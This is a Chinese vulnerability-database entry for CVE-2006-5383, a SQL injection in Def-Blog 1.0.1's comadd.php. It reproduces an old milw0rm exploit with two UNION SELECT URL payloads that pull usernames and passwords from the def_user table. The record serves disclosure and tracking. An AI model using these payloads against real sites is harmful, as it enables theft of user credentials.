Def-Blog 'Comadd.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111290 漏洞类型 SQL注入
发布时间 2006-10-15 更新时间 2006-10-19
CVE编号 CVE-2006-5383 CNNVD-ID CNNVD-200610-315
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2567
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-315
|漏洞详情
Def-Blog1.0.1及之前版本的comadd.php中存在SQL注入漏洞,远程攻击者可通过article参数执行任意SQL命令。
|漏洞EXP
#==============================================================================================
#Def-Blog <= v1.0.1 (article) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.easy-script.com/Def_Blog_V.1.0.1.zip    
#                                                                     
#Version : v1.0.1                                           
#                                                       
#
#Exploit :
#--------------------------------
#
#FOR USER : comadd.php?article=-1%20union%20select%20null,pseudo%20from%20def_user
#FOR PASS : comadd.php?article=-1%20union%20select%20null,mdp%20from%20def_user
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-10-15]
|参考资料

来源:XF
名称:defblog-comadd-sql-injection(29561)
链接:http://xforce.iss.net/xforce/xfdb/29561
来源:BID
名称:20545
链接:http://www.securityfocus.com/bid/20545
来源:MILW0RM
名称:2567
链接:http://www.milw0rm.com/exploits/2567
来源:VUPEN
名称:ADV-2006-4049
链接:http://www.frsirt.com/english/advisories/2006/4049
来源:SECUNIA
名称:22389
链接:http://secunia.com/advisories/22389
来源:MILW0RM
名称:2567
链接:http://milw0rm.com/exploits/2567